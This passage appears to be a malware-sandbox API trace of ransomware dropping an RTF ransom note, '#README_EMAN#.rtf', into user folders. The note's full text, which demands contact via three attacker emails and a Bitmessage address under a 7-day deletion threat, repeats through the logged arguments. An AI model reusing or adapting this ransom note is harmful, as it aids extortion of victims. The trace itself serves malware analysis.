server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.576] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.577] CloseHandle (hObject=0x2c8) returned 1 [0278.577] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0278.577] GetLastError () returned 0x2 [0278.577] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) 